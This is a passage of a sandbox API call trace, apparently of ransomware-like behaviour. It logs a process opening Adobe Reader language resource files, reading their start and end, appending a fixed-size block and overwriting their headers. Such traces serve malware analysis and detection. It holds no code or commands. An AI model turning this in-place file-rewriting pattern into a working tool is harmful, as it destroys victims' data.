(lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\fin32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\fin32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0115.034] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.034] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7ffa [0115.034] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.034] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.034] ReleaseMutex (hMutex=0x168) returned 1 [0115.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fin32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fin32.clx", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fin32.clx", lpUsedDefaultChar=0x0) returned 9 [0115.034] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.044] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffa [0115.044] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.058] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffa [0115.058] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.059] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0115.059] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.060] CloseHandle (hObject=0x1fc) returned 1 [0115.063] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.074] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.074] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2a0 [0115.074] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.074] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.074] ReleaseMutex (hMutex=0x168) returned 1 [0115.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gre.fca", lpUsedDefaultChar=0x0) returned 7 [0115.074] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x2fdf2bc*=0x2a0, lpOverlapped=0x0) returned 1 [0115.076] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0115.076] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x828, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x2fdf2d0*=0x828, lpOverlapped=0x0) returned 1 [0115.076] CloseHandle (hObject=0x1f0) returned 1 [0115.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm92.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm92.ths"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.077] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.077] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xc0c00 [0115.078] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.078] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.078] ReleaseMutex (hMutex=0x168) returned 1 [0115.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm92.ths", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm92.ths", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="grm92.ths", lpUsedDefaultChar=0x0) returned 9 [0115.078] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0115.140] ReadFile (in: hFile=0x1f0, lpBuffer=0x289e978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.444] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xbfc00 [0115.444] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.457] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xbfc00 [0115.457] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea89b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.458] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0115.458] WriteFile (in: hFile=0x1f0, lpBuffer=0x28ad9a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.458] WriteFile (in: hFile=0x1f0, lpBuffer=0x28ad9a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.458] CloseHandle (hObject=0x1f0) returned 1 [0115.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrvphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrvphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.459] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.459] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1f21 [0115.459] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.460] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.460] ReleaseMutex (hMutex=0x168) returned 1 [0115.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrvphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrvphon.env", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hrvphon.env", lpUsedDefaultChar=0x0) returned 11 [0115.460] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1f21, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1f21, lpOverlapped=0x0) returned 1 [0115.465] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0115.466] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x24a9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf2d0*=0x24a9, lpOverlapped=0x0) returned 1 [0115.466] CloseHandle (hObject=0x1f0) returned 1 [0115.467] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.468] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.468] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7ffb [0115.468] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.468] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.468] ReleaseMutex (hMutex=0x168) returned 1 [0115.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl32.clx", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="itl32.clx", lpUsedDefaultChar=0x0) returned 9 [0115.468] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.475] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffb [0115.475] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.478] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffb [0115.478] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea89b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.479] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0115.479] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.480] CloseHandle (hObject=0x1f0) returned 1 [0115.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lit32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lit32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.481] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.481] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7ffe [0115.481] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.481] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.481] ReleaseMutex (hMutex=0x168) returned 1 [0115.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lit32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lit32.clx", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lit32.clx", lpUsedDefaultChar=0x0) returned 9 [0115.482] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.485] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffe [0115.485] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.492] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6ffe [0115.492] WriteFile (in: hFile=0x1f0, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.493] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0115.493] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.493] CloseHandle (hObject=0x1f0) returned 1 [0115.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nyn.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nyn.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.494] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.494] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7000 [0115.494] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.494] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.494] ReleaseMutex (hMutex=0x168) returned 1 [0115.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nyn.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nyn.hyp", lpUsedDefaultChar=0x0) returned 7 [0115.494] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.640] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6000 [0115.640] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0115.644] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6000 [0115.644] WriteFile (in: hFile=0x1f0, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.652] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0115.652] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.652] CloseHandle (hObject=0x1f0) returned 1 [0115.653] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\prt.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\prt.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.654] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.654] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x800 [0115.654] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.654] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.654] ReleaseMutex (hMutex=0x168) returned 1 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prt.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prt.hyp", lpUsedDefaultChar=0x0) returned 7 [0115.654] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2fdf2bc*=0x800, lpOverlapped=0x0) returned 1 [0115.909] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0115.909] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xd88, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xd88, lpOverlapped=0x0) returned 1 [0115.910] CloseHandle (hObject=0x1f0) returned 1 [0115.910] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.911] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0115.911] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8000 [0115.911] 